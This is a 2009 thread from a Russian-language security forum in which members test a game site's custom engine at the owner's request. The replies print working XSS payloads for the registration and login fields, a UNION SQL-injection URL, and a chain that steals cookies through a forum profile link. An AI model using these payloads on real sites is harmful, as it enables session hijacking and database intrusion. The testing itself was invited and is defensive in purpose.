ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

l2faust.ru
  #1  
Старый 13.11.2009, 17:42
Cthulchu
Познавший АНТИЧАТ
Регистрация: 22.11.2007
Сообщений: 1,822
Провел на форуме:
4468361

Репутация: 1549


Отправить сообщение для Cthulchu с помощью ICQ
По умолчанию l2faust.ru

проверьте двиг. самописное. у кого замечания не по теме - пишем ПМ.
 
Ответить с цитированием

  #2  
Старый 13.11.2009, 18:43
Adm1n4eG
Познающий
Регистрация: 27.03.2009
Сообщений: 40
Провел на форуме:
1191962

Репутация: 39
По умолчанию

XSS
Уязвимо поле Логин или вот так http://l2faust.ru/acc/index.php?do=retry&login="><script>alert()</script>
 
Ответить с цитированием

  #3  
Старый 13.11.2009, 20:16
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841

Репутация: 712


Отправить сообщение для geforse с помощью ICQ
Smile

Не только логин ..

// Мда, ну и нахрена была постить полуметровый скриншот, если можно просто написать, что и поле "Секретный вопрос" так же уязвимо?
BlackSun.

Последний раз редактировалось BlackSun; 13.11.2009 в 20:30..
 
Ответить с цитированием

  #4  
Старый 13.11.2009, 21:54
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
По умолчанию

Цитата:
http://l2faust.ru/index.php?lang=ru%60+from+%60newstbl%60+union+sele ct+1,2,version()/*&act=news
MySql-inj
Сначала lang пишеться в сессию... потом учавствует в выборке.
Version():5.0.45-log
--------------------------------------------------
Регистрация->все поля не фильтруються(пост пассивки)
Поле секретного вопроса даст активку при востановлении пассворда..

Последний раз редактировалось S00pY; 13.11.2009 в 22:26..
 
Ответить с цитированием

  #5  
Старый 17.11.2009, 13:44
XenkoK
Новичок
Регистрация: 23.12.2008
Сообщений: 18
Провел на форуме:
311387

Репутация: 7
Отправить сообщение для XenkoK с помощью ICQ
По умолчанию

http://l2faust.ru/acc/index.php?do=register

при регистрации во все поля добавить "><script>alert()</script> и нажать регистрация!!! И мы увидим 4 алерта XSS
 
Ответить с цитированием

  #6  
Старый 19.11.2009, 23:38
Cthulchu
Познавший АНТИЧАТ
Регистрация: 22.11.2007
Сообщений: 1,822
Провел на форуме:
4468361

Репутация: 1549


Отправить сообщение для Cthulchu с помощью ICQ
По умолчанию

Цитата:
Сообщение от XenkoK  
http://l2faust.ru/acc/index.php?do=register

при регистрации во все поля добавить "><script>alert()</script> и нажать регистрация!!! И мы увидим 4 алерта XSS
второй пост этой темы почитай.
Ребят, умнички.
ща пофиксим и неплохо было бы перепроверить
 
Ответить с цитированием

  #7  
Старый 06.12.2009, 23:48
AKYLA
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596

Репутация: 88
По умолчанию

XSS
Цитата:
В пост запросе http://l2faust.ru/acc/index.php
Поля: regLogin, regAnswer, regQuestion, regEmail
Подставляем
Цитата:
1"+onmouseover=alert(12345)+
 
Ответить с цитированием

  #8  
Старый 07.12.2009, 00:20
AKYLA
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596

Репутация: 88
По умолчанию

Так же в купе с уязвимостью vBulletin, публичной (поле веб адреса пользователя не фильтруется) и фиксацией сессии, конструируем типа такой ссылки:
Цитата:
http://l2faust.ru/acc/index.php?do=register&regLogin=1"+onmouseover=aler t(document.cookie)+
и вставляем в своем профиле на форуме, теперь при нажатии получаем куки, собственно если постараться то возможно и админа можно заполучить

Последний раз редактировалось AKYLA; 07.12.2009 в 00:24..
 
Ответить с цитированием

  #9  
Старый 07.12.2009, 11:23
Cthulchu
Познавший АНТИЧАТ
Регистрация: 22.11.2007
Сообщений: 1,822
Провел на форуме:
4468361

Репутация: 1549


Отправить сообщение для Cthulchu с помощью ICQ
По умолчанию

ок спасибо. ребят, спасибо, но давайте так. впредь перед тем, как юзать експлойты - вы меня предупреждайте, чтобы я хостера предупредил, а то они чуть не забанили подсеть с которой была атака.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ